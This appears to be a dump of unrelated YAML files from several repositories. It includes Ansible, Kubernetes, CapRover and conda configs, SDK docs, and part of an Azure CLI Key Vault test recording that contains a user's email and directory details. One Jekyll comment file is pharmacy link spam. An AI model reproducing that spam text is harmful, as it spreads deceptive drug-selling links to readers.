elek/bigdata-docker
301c5c78dab4db568fb03199a067f296ed9f4042
[ "Apache-2.0" ]
1
2019-01-26T14:06:34.000Z
2019-01-26T14:06:34.000Z
infra-playbooks/registrator.yaml
elek/bigdata-docker
301c5c78dab4db568fb03199a067f296ed9f4042
[ "Apache-2.0" ]
18
2017-02-20T12:40:05.000Z
2021-02-02T10:36:26.000Z
--- - hosts: all tasks: - name: docker_container: name: registrator image: elek/registrator.py state: started network_mode: host pull: true volumes: - "/var/run/docker.sock:/var/run/docker.sock"
21.615385
57
0.516014
47d333ae83c52a08036386424af6fe0fecce58f1
1,931
yaml
YAML
docs/example-configs/cascading.yaml
Patryk27/lxd-snapper
9b096962122988abb3677a69ced244ea7cec2fa2
[ "MIT" ]
31
2019-07-23T00:34:24.000Z
2022-03-15T06:43:37.000Z
docs/example-configs/cascading.yaml
Patryk27/lxd-snapper
9b096962122988abb3677a69ced244ea7cec2fa2
[ "MIT" ]
6
2020-12-22T19:33:46.000Z
2022-03-14T20:36:33.000Z
docs/example-configs/cascading.yaml
Patryk27/lxd-snapper
9b096962122988abb3677a69ced244ea7cec2fa2
[ "MIT" ]
3
2020-12-22T19:30:46.000Z
2022-03-13T08:40:40.000Z
# This configuration presents the feature of cascading policies. # # In order to explain it, first let's imagine we have following instances set # up: # # Project | Instance # -------- | -------- # default | nginx # client-a | php # client-a | mysql # client-c | php # client-c | mysql # # Now - we'd like for every instance to have at least two snapshots (just for # some quick accident recovery), with the exception of: # # - important clients, for which we'd like to keep latest 15 snapshots, # # - unimportant clients, for which we'd like to keep latest 5 snapshots, # # - databases (doesn't matter for which client!), for which we'd like to keep # the latest 25 snapshots. # # That's what cascading policies are for - when an instance matches many # policies (e.g. like the `mysql` instance inside each of our sample projects # does), what happens is that lxd-snapper _squashes_ all of the matching # policies, overwriting duplicated properties. # # This allows you to reduce the amount of duplicated rules, because you can # just extract the "core" policies to the top of the file and overwrite them # for some selected instances below. # # For example, in case of the `client-a/mysql` instance, lxd-snapper first # finds the `important-clients` policy, but then it notices that the # `databases` policy matches `mysql` too; the `keep-last` from `databases` # takes over the priority (because it's _below_ `important-clients`) and voilà. # # The README.md provides a bit more interesting example with similar use-case # in mind; you'll find this feature the most useful when dealing with instances # scattered among different projects. policies: everyone: keep-last: 2 important-clients: included-projects: ['client-a', 'client-b'] keep-last: 15 unimportant-clients: included-projects: ['client-c'] keep-last: 5 databases: included-instances: ['mysql'] keep-last: 25
33.877193
79
0.718281
f49bea28a7e20a0add8abfdd5af4139ffa0fd05b
1,415
yaml
YAML
moviepy/meta.yaml
micah-rufsvold/yt-swap
59de236de89853e630772a0b64d5a19b677a04d0
[ "MIT" ]
null
null
null
moviepy/meta.yaml
micah-rufsvold/yt-swap
59de236de89853e630772a0b64d5a19b677a04d0
[ "MIT" ]
null
null
null
moviepy/meta.yaml
micah-rufsvold/yt-swap
59de236de89853e630772a0b64d5a19b677a04d0
[ "MIT" ]
null
null
null
{% set name = "moviepy" %} {% set version = "2.0.0.dev2" %} package: name: "{{ name|lower }}" version: "{{ version }}" source: url: "https://pypi.io/packages/source/{{ name[0] }}/{{ name }}/{{ name }}-{{ version }}.tar.gz" sha256: c0567bbaaf17936f498b53f40b8c1e2d7667d4b917f775cac610c4af382d174f build: number: 0 script: "{{ PYTHON }} -m pip install . -vv" requirements: host: - decorator >=4.0.2,<5.0 - imageio >=2.5,<3.0 - imageio_ffmpeg >=0.2.0 - numpy >=1.17.3 - pip - proglog <=1.0.0 - python - requests >=2.8.1,<3.0 run: - decorator >=4.0.2,<5.0 - imageio >=2.5,<3.0 - imageio_ffmpeg >=0.2.0 - numpy >=1.17.3 - proglog <=1.0.0 - python - requests >=2.8.1,<3.0 test: imports: - moviepy - moviepy.audio - moviepy.audio.fx - moviepy.audio.fx.all - moviepy.audio.io - moviepy.audio.tools - moviepy.video - moviepy.video.compositing - moviepy.video.fx - moviepy.video.fx.all - moviepy.video.io - moviepy.video.tools requires: - coverage <5.0 - coveralls >=1.1,<2.0 - pytest >=3.0.0,<4.0 - pytest-cov >=2.5.1,<3.0 - requests >=2.8.1,<3.0 about: home: "https://zulko.github.io/moviepy/" license: MIT license_family: MIT license_file: summary: "Video editing with Python" doc_url: dev_url: extra: recipe-maintainers: - your-github-id-here
20.808824
97
0.583039
d0ed12ee8aed8f79d6c55a7e5d6870e5a047f723
234
yml
YAML
.github/FUNDING.yml
mylifeonmars/eladmin
8f96b78fe164044c2b55de37b48930533b7a41d4
[ "Apache-2.0" ]
1
2021-10-17T03:36:15.000Z
2021-10-17T03:36:15.000Z
.github/FUNDING.yml
mylifeonmars/eladmin
8f96b78fe164044c2b55de37b48930533b7a41d4
[ "Apache-2.0" ]
null
null
null
.github/FUNDING.yml
mylifeonmars/eladmin
8f96b78fe164044c2b55de37b48930533b7a41d4
[ "Apache-2.0" ]
null
null
null
# These are supported funding model platforms github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] otechie: c9635b6fcfabfeed custom: https://aurora-1255840532.cos.ap-chengdu.myqcloud.com/donation.png
39
85
0.794872
c226290e72fce772605cc7a08a4c4768cfeef605
1,619
yaml
YAML
redis/k8s/deployment.yaml
guitarrapc/k8s-lab
e99163ed6262ce0b563c711da80dc2efbac55a48
[ "MIT" ]
null
null
null
redis/k8s/deployment.yaml
guitarrapc/k8s-lab
e99163ed6262ce0b563c711da80dc2efbac55a48
[ "MIT" ]
null
null
null
redis/k8s/deployment.yaml
guitarrapc/k8s-lab
e99163ed6262ce0b563c711da80dc2efbac55a48
[ "MIT" ]
null
null
null
apiVersion: v1 kind: Service metadata: name: redis labels: app: redis spec: type: LoadBalancer selector: app: redis ports: - port: 6379 targetPort: redis protocol: TCP --- apiVersion: apps/v1 kind: Deployment metadata: name: redis labels: app: redis spec: selector: matchLabels: app: redis strategy: type: Recreate template: metadata: labels: app: redis spec: containers: - image: redis:5.0.7-alpine name: redis ports: - containerPort: 6379 name: redis --- apiVersion: v1 kind: Service metadata: name: redisinsight labels: app: redisinsight spec: type: LoadBalancer selector: app: redisinsight ports: - port: 8001 targetPort: redisinsight protocol: TCP --- apiVersion: apps/v1 kind: Deployment metadata: name: redisinsight labels: app: redisinsight spec: selector: matchLabels: app: redisinsight strategy: type: Recreate template: metadata: labels: app: redisinsight spec: containers: - name: redisinsight image: redislabs/redisinsight imagePullPolicy: Always env: # require to set HOST/PORT on env to avoid pod port conflict when using svc. # ref: https://github.com/RedisLabs/redislabs-docs/issues/676 - name: REDISINSIGHT_HOST value: "0.0.0.0" - name: REDISINSIGHT_PORT value: "8001" ports: - containerPort: 8001 name: redisinsight
18.825581
88
0.590488
258597aea7aa939766fbbf55803a691fc4b4729e
2,352
yml
YAML
public/v4/apps/jellyfin.yml
aksanoble/one-click-apps
839590dea17ca297a39f16e53bccdc3fa0036571
[ "Apache-2.0" ]
281
2019-01-22T21:17:54.000Z
2022-03-31T22:47:03.000Z
public/v4/apps/jellyfin.yml
aksanoble/one-click-apps
839590dea17ca297a39f16e53bccdc3fa0036571
[ "Apache-2.0" ]
546
2019-01-20T06:09:27.000Z
2022-03-29T02:23:06.000Z
public/v4/apps/jellyfin.yml
aksanoble/one-click-apps
839590dea17ca297a39f16e53bccdc3fa0036571
[ "Apache-2.0" ]
408
2019-01-20T05:57:59.000Z
2022-03-23T17:22:30.000Z
captainVersion: 4 services: $$cap_appname: image: ghcr.io/linuxserver/jellyfin environment: PUID: $$cap_puid PGID: $$cap_pgid TZ: $$cap_tz JELLYFIN_PublishedServerUrl: '$$cap_appname.$$cap_root_domain' volumes: - $$cap_appname-config:/config - $$cap_appname-tvshows:/data/tvshows - $$cap_appname-movies:/data/movies caproverExtra: containerHttpPort: '8096' ports: - 7359:7359 - 1900:1900 caproverOneClickApp: variables: - id: '$$cap_puid' label: Jellyfin UserID defaultValue: 1000 description: UserID used by JellyFin to avoid permission problems, please refer to docs- https://github.com/linuxserver/docker-jellyfin#Parameters validRegex: /[0-9]/ - id: '$$cap_pgid' label: Jellyfin GroupID defaultValue: 1000 description: GroupID used by JellyFin to avoid permission problems, please refer to docs- https://github.com/linuxserver/docker-jellyfin#Parameters validRegex: /[0-9]/ - id: '$$cap_tz' label: Time Zone defaultValue: Asia/Kolkata description: Get yours from https://en.wikipedia.org/wiki/List_of_tz_database_time_zones validRegex: /.{1,}/ instructions: start: |- Jellyfin is a Free Software Media System that puts you in control of managing and streaming your media. It is an alternative to the proprietary Emby and Plex, to provide media from a dedicated server to end-user devices via multiple apps. For more details visit- https://github.com/jellyfin/jellyfin PS. It might not work with RPi, or atleast, you wont be able to use OpenMax or V4L2 because Caprover ignores 'devices' parameters of docker-compose end: |- Jellyfin has been successfully deployed! Please wait atleast 2-4 mins before trying to connect. To enable HTTPS, enable it inside app config from caprover dashboard. 'Enable HTTPS' setting inside of Jellyfin might not work. displayName: Jellyfin isOfficial: false description: A free media streaming alternative to Plesk. Also supports group sync. documentation: See https://github.com/linuxserver/docker-jellyfin
47.04
235
0.654762
25a28c4fb342ebb64d24e9a4865153158f0728ce
2,010
yml
YAML
docs-ref-autogen/vss-web-extension-sdk/TFS.Work.Contracts.CategoryConfiguration.yml
willsmythe/vsts-docs-sdk-web
adec1f5dc5a234de53ff5eeba62f54632a555909
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/vss-web-extension-sdk/TFS.Work.Contracts.CategoryConfiguration.yml
willsmythe/vsts-docs-sdk-web
adec1f5dc5a234de53ff5eeba62f54632a555909
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/vss-web-extension-sdk/TFS.Work.Contracts.CategoryConfiguration.yml
willsmythe/vsts-docs-sdk-web
adec1f5dc5a234de53ff5eeba62f54632a555909
[ "CC-BY-4.0", "MIT" ]
null
null
null
### YamlMime:UniversalReference items: - uid: vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration name: CategoryConfiguration fullName: CategoryConfiguration children: - vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration.name - >- vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration.referenceName - >- vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration.workItemTypes langs: - typeScript type: interface summary: Details about a given backlog category source: path: tfs.d.ts startLine: 21825 remote: path: typings\tfs.d.ts repo: 'https://github.com/Microsoft/vss-web-extension-sdk.git' branch: master package: vss-web-extension-sdk module: TFS/Work/Contracts - uid: vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration.name name: name fullName: name children: [] langs: - typeScript type: property summary: Name syntax: content: string name return: type: - string module: TFS/Work/Contracts - uid: >- vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration.referenceName name: referenceName fullName: referenceName children: [] langs: - typeScript type: property summary: Category Reference Name syntax: content: string referenceName return: type: - string module: TFS/Work/Contracts - uid: >- vss-web-extension-sdk.TFS.Work.Contracts.CategoryConfiguration.workItemTypes name: workItemTypes fullName: workItemTypes children: [] langs: - typeScript type: property summary: Work item types for the backlog category syntax: content: 'WorkItemTypeReference[] workItemTypes' return: type: - >- @vss-web-extension-sdk.TFS.WorkItemTracking.Contracts.WorkItemTypeReference[] module: TFS/Work/Contracts
28.714286
89
0.664677
405d2c16dfa0ebae9ef3932640e5582c3ac3abde
1,709
yml
YAML
_data/comments/elasticsearch-restore/comment-1567483584423.yml
ZacharyThomas/ZacharyThomas.github.io
2f44677f893328531dfa8cd8ed8082468400a905
[ "MIT" ]
3
2016-08-09T13:44:22.000Z
2016-09-22T02:44:13.000Z
_data/comments/elasticsearch-restore/comment-1567483584423.yml
ZacharyThomas/ZacharyThomas.github.io
2f44677f893328531dfa8cd8ed8082468400a905
[ "MIT" ]
null
null
null
_data/comments/elasticsearch-restore/comment-1567483584423.yml
ZacharyThomas/ZacharyThomas.github.io
2f44677f893328531dfa8cd8ed8082468400a905
[ "MIT" ]
null
null
null
_id: 31c18a00-ce00-11e9-a4ef-87146b68ccad message: >- If fqi.lflv.zacharythomas.github.io.xur.ff cruel [URL=http://casatheodoro.com/prednisone/ - prednisone without a prescription[/URL - [URL=http://casatheodoro.com/cialis-5-mg/ - cialis canadian pharmacy[/URL - [URL=http://sallyrjohnson.com/levitra/ - levitra 20 mg walmart[/URL - [URL=http://solepost.com/ventolin/ - buy ventolin online[/URL - [URL=http://ivapelocal.com/viagra-generic/ - viagra pills[/URL - [URL=http://livinlifepc.com/propecia/ - buy propecia[/URL - [URL=http://meetatsonoma.com/cialis/ - tadalafil 5mg[/URL - haematoma diathermy, hearts <a href="http://casatheodoro.com/prednisone/">prednisone 10 mg</a> <a href="http://casatheodoro.com/cialis-5-mg/">cialis 10mg</a> <a href="http://sallyrjohnson.com/levitra/">levitra.com</a> <a href="http://solepost.com/ventolin/">el salbutamol</a> <a href="http://ivapelocal.com/viagra-generic/">viagra cost walmart</a> <a href="http://livinlifepc.com/propecia/">proscar description</a> <a href="http://meetatsonoma.com/cialis/">cialis for sale philippines</a> hyperresonant thalassaemias secrete http://casatheodoro.com/prednisone/ prednisone http://casatheodoro.com/cialis-5-mg/ cialis online http://sallyrjohnson.com/levitra/ levitra 20 mg generic http://solepost.com/ventolin/ buy ventolin http://ivapelocal.com/viagra-generic/ viagra and stamina http://livinlifepc.com/propecia/ generic propecia http://meetatsonoma.com/cialis/ generic cialis canada polymerase reasoning suffering, visualized. name: uvabihuhkajuw email: 4ac17445bd7654650f9bc943211525c1 url: 'http://casatheodoro.com/prednisone/' hidden: '' date: '2019-09-03T04:06:24.423Z'
55.129032
79
0.741369
40e522f99ac183e0e8ca5e63e3c40785b830e431
110
yml
YAML
_config.yml
sdf94/Springboard
1311eba613ce2f8feafe2cc6a2d8b0bf0c84a956
[ "MIT" ]
null
null
null
_config.yml
sdf94/Springboard
1311eba613ce2f8feafe2cc6a2d8b0bf0c84a956
[ "MIT" ]
null
null
null
_config.yml
sdf94/Springboard
1311eba613ce2f8feafe2cc6a2d8b0bf0c84a956
[ "MIT" ]
1
2020-07-29T03:14:19.000Z
2020-07-29T03:14:19.000Z
theme: jekyll-theme-minimal title: Welcome to Sarah's projects! description: Continually updating my projects
27.5
45
0.827273
ad3196b205c534f3f704ebe5135bfe740dbb65d9
46
yml
YAML
caf/roles/front_end/tasks/main.yml
mytechnotalent/Ansible-For-Everyone
4ac19f6ed9339f9c660a0e5594cbb54ab92a0e1a
[ "Apache-2.0" ]
6
2020-12-31T14:42:42.000Z
2022-01-04T02:07:42.000Z
caf/roles/front_end/tasks/main.yml
mytechnotalent/Ansible-For-Everyone
4ac19f6ed9339f9c660a0e5594cbb54ab92a0e1a
[ "Apache-2.0" ]
null
null
null
caf/roles/front_end/tasks/main.yml
mytechnotalent/Ansible-For-Everyone
4ac19f6ed9339f9c660a0e5594cbb54ab92a0e1a
[ "Apache-2.0" ]
2
2021-04-14T04:27:04.000Z
2021-12-03T12:40:31.000Z
--- - include: selenium.yml tags: selenium
9.2
23
0.652174
214d9df6a23cfef4188a2352ba2dde0af488d31a
252
yml
YAML
config/_config.dev.yml
mkrejpsky/jekyll-theme-pirati
bd6b50e46708e623fe67e054e86252d7d056ca3d
[ "MIT" ]
null
null
null
config/_config.dev.yml
mkrejpsky/jekyll-theme-pirati
bd6b50e46708e623fe67e054e86252d7d056ca3d
[ "MIT" ]
null
null
null
config/_config.dev.yml
mkrejpsky/jekyll-theme-pirati
bd6b50e46708e623fe67e054e86252d7d056ca3d
[ "MIT" ]
null
null
null
## # Dev Configuration file # For stuff that helps locally only! # helpful config settings: exclude # Uncomment if you run your styleguide locally #styleguide_base_url: 'http://localhost:3000/' styleguide_base_url: https://styleguide.pirati.cz/latest
28
56
0.785714
c782a215ccb192f2612532d8d7f708237f656a79
425,997
yaml
YAML
src/azure-cli/azure/cli/command_modules/keyvault/tests/latest/recordings/test_keyvault_mgmt.yaml
kethireddysudhakar/azure-cli
a29b6a82566303b3c2f0e3489f52ec1ef1bffec3
[ "MIT" ]
1
2020-03-30T10:58:01.000Z
2020-03-30T10:58:01.000Z
src/azure-cli/azure/cli/command_modules/keyvault/tests/latest/recordings/test_keyvault_mgmt.yaml
rinney16/azure-cli
4f2366bd927e0450eac15b1e7c6ce8aae2fbf259
[ "MIT" ]
null
null
null
src/azure-cli/azure/cli/command_modules/keyvault/tests/latest/recordings/test_keyvault_mgmt.yaml
rinney16/azure-cli
4f2366bd927e0450eac15b1e7c6ce8aae2fbf259
[ "MIT" ]
null
null
null
interactions: - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate Connection: - keep-alive User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-graphrbac/0.60.0 Azure-SDK-For-Python accept-language: - en-US method: GET uri: https://graph.windows.net/00000000-0000-0000-0000-000000000000/me?api-version=1.6 response: body: string: '{"odata.metadata":"https://graph.windows.net/00000000-0000-0000-0000-000000000000/$metadata#directoryObjects/@Element","odata.type":"Microsoft.DirectoryServices.User","objectType":"User","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","deletionTimestamp":null,"accountEnabled":true,"ageGroup":null,"assignedLicenses":[],"assignedPlans":[],"city":null,"companyName":null,"consentProvidedForMinor":null,"country":null,"createdDateTime":"2019-10-21T06:37:42Z","creationType":"Invitation","department":null,"dirSyncEnabled":null,"displayName":"Bin Ma","employeeId":null,"facsimileTelephoneNumber":null,"givenName":null,"immutableId":null,"isCompromised":null,"jobTitle":null,"lastDirSyncTime":null,"legalAgeGroupClassification":null,"mail":"bim@microsoft.com","mailNickname":"bim_microsoft.com#EXT#","mobile":null,"onPremisesDistinguishedName":null,"onPremisesSecurityIdentifier":null,"otherMails":["bim@microsoft.com"],"passwordPolicies":null,"passwordProfile":null,"physicalDeliveryOfficeName":null,"postalCode":null,"preferredLanguage":null,"provisionedPlans":[],"provisioningErrors":[],"proxyAddresses":["SMTP:bim@microsoft.com"],"refreshTokensValidFromDateTime":"2019-10-21T06:37:41Z","showInAddressList":false,"signInNames":[],"sipProxyAddress":null,"state":null,"streetAddress":null,"surname":null,"telephoneNumber":null,"thumbnailPhoto@odata.mediaEditLink":"directoryObjects/9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa/Microsoft.DirectoryServices.User/thumbnailPhoto","usageLocation":null,"userIdentities":[],"userPrincipalName":"bim_microsoft.com#EXT#@AzureSDKTeam.onmicrosoft.com","userState":"Accepted","userStateChangedOn":"2019-10-21T06:39:35Z","userType":"Guest"}' headers: access-control-allow-origin: - '*' cache-control: - no-cache content-length: - '1668' content-type: - application/json; odata=minimalmetadata; streaming=true; charset=utf-8 dataserviceversion: - 3.0; date: - Mon, 23 Mar 2020 10:20:32 GMT duration: - '2261412' expires: - '-1' ocp-aad-diagnostics-server-name: - 03tJtVtrK59o2WrrDjJFasNQO9BoGoGL+dG53QSLpQQ= ocp-aad-session-key: - yc7i-PluepTpYIiUekMPohmnDqj35moxtwmOLa7gpFinRTx9JYofp4JAYs7iC2e0v5-QAZ65i5MLwsRdSfNe6OrMkJTFQsPEeCYMi34nw0Y5Qe8HcwhmU9RRY0hyiHk3.Fw8McsNcG573LiTU-WXZpGycRKUcDiTP4sr8cdKsRMg pragma: - no-cache request-id: - 1c1678ab-177d-4d05-81a0-d28bfe1c8c09 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-ms-dirapi-data-contract-version: - '1.6' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "standard"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["get", "create", "delete", "list", "update", "import", "backup", "restore", "recover"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["get", "list", "delete", "create", "import", "update", "managecontacts", "getissuers", "listissuers", "setissuers", "deleteissuers", "manageissuers", "recover"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "enableSoftDelete": false, "softDeleteRetentionInDays": 90, "enableRbacAuthorization": false}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault create Connection: - keep-alive Content-Length: - '840' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n -l --enable-soft-delete User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net","provisioningState":"RegisteringDns"}}' headers: cache-control: - no-cache content-length: - '1194' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:20:39 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault create Connection: - keep-alive ParameterSetName: - -g -n -l --enable-soft-delete User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1190' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:12 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault show Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resources?$filter=resourceType%20eq%20%27Microsoft.KeyVault%2Fvaults%27&api-version=2015-11-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/azure-cli-test-rg/providers/Microsoft.KeyVault/vaults/azureclitest-vault","name":"azureclitest-vault","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv5","name":"bim-kv5","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv8","name":"bim-kv8","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv-666","name":"bim-kv-666","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test1","name":"bim-sd-test1","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test2","name":"bim-sd-test2","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test3","name":"bim-sd-test3","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test4","name":"bim-sd-test4","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimkvTest","name":"bimkvTest","type":"Microsoft.KeyVault/vaults","location":"northcentralus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimtrack2test","name":"bimtrack2test","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimtrack2test2","name":"bimtrack2test2","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim_pl_test_rg/providers/Microsoft.KeyVault/vaults/bimplkv","name":"bimplkv","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/feng-cli-rg/providers/Microsoft.KeyVault/vaults/fengws1keyvault5d9d94ec6","name":"fengws1keyvault5d9d94ec6","type":"Microsoft.KeyVault/vaults","location":"eastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/feng-cli-rg/providers/Microsoft.KeyVault/vaults/fengwskeyvault7b56d2ee87","name":"fengwskeyvault7b56d2ee87","type":"Microsoft.KeyVault/vaults","location":"westus2","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest/providers/Microsoft.KeyVault/vaults/vault4848","name":"vault4848","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg1/providers/Microsoft.KeyVault/vaults/jlkv0227","name":"jlkv0227","type":"Microsoft.KeyVault/vaults","location":"southeastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg1/providers/Microsoft.KeyVault/vaults/jlkv0309","name":"jlkv0309","type":"Microsoft.KeyVault/vaults","location":"southeastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yeming/providers/Microsoft.KeyVault/vaults/yeming","name":"yeming","type":"Microsoft.KeyVault/vaults","location":"eastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zhoxing-test/providers/Microsoft.KeyV